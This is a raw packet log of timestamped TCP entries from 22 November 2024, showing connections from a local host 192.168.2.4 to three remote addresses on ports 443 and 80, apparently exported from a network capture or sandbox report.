                                                                                                                                                                                                            Nov 22, 2024 04:26:14.198695898 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.198898077 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.198926926 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.199126959 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.199155092 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.199364901 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.199399948 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.199410915 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.199619055 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.199655056 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.243333101 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.243578911 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.243634939 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.243653059 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.291327000 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.291640043 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.291692972 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.291749954 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.339327097 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.339494944 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.387351990 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.455702066 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.455842018 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.459469080 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.459498882 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.459973097 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.508429050 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.671432972 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.089432955 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.135339975 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675059080 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675132036 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675153017 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675172091 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675204039 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675215006 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675235987 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675246954 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675266027 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675266981 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675295115 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.675343037 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.695187092 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.695277929 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.695303917 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.695460081 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:16.698302984 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:17.935043097 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:17.935121059 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:17.935165882 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:17.935184956 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.168037891 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.168309927 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.168392897 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.178776026 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.178822041 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.240479946 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.240550041 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.240669012 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.241432905 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:19.241450071 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:20.513544083 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:20.513664007 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:20.517735004 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:20.517762899 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:20.518140078 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:20.527573109 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:20.527615070 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:20.527764082 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.234875917 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.235037088 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.235129118 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.235358953 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.235382080 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.235399961 CET49742443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.235409021 CET44349742172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.306101084 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.425915003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.426013947 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.426232100 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:21.548223019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804771900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804811001 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804894924 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804902077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804949045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804958105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.804970026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.805017948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.805052042 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.805366993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.805389881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.805398941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.805444002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.806118965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.806181908 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.924552917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.924736977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.924911022 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.928821087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.928848982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.928919077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.934819937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.934853077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:22.934900999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.006262064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.006306887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.006371975 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.010474920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.010560989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.010610104 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.019016027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.022068024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.022125959 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.022133112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.030489922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.030543089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.030580997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.039611101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.040119886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.040167093 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.047472000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.047542095 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.047576904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.057327032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.057343960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.057519913 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.065150023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.065167904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.065226078 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.073322058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.073385954 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.073602915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.080705881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.080761909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.080836058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.133445024 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.173136950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.173160076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.173206091 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.176680088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.207525969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.207588911 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.207596064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.209817886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.209855080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.209938049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.214476109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.214518070 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.214551926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.219165087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.219206095 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.219261885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.223906994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.223933935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.223948002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.228527069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.228590012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.228606939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.233277082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.233300924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.233321905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.237859964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.237905979 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.237946987 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.242554903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.242603064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.242640972 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.247266054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.247335911 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.247373104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.251909971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.251991987 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.252034903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.256599903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.256656885 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.256719112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.261250019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.261296988 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.261354923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.265916109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.265968084 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.265993118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.270610094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.270652056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.270829916 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.275278091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.275377989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.275388002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.279978037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.280039072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.280040979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.284645081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.284703970 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.284739017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.289282084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.289350033 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.289413929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.294012070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.294054985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.294075966 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.298614025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.298659086 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.374209881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.374258041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.374319077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.376523018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.376684904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.376964092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.381150961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.412408113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.412460089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.412472963 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.414237022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.414294004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.414315939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.417884111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.417951107 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.417984009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.421560049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.421608925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.421619892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.425167084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.425226927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.425249100 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.428720951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.428762913 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.428800106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.432168961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.432205915 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.432271004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.435662985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.435744047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.435760975 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.439105988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.439153910 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.439217091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.442642927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.442684889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.442693949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.446125031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.446175098 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.446266890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.449584007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.449610949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.449626923 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.453052998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.453110933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.453144073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.456518888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.456613064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.456624985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.460032940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.460074902 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.460153103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.463479996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.463530064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.463593006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.467016935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.467077017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.467077017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.470441103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.470494032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.470566034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.473932028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.473977089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.474034071 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.477448940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.477505922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.477510929 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.480868101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.480917931 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.480962992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.484378099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.484427929 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.484462023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.487865925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.487926006 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.487938881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.491344929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.491389036 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.491447926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:23.494798899 CET8049744185.215.113.16192.168.2.4
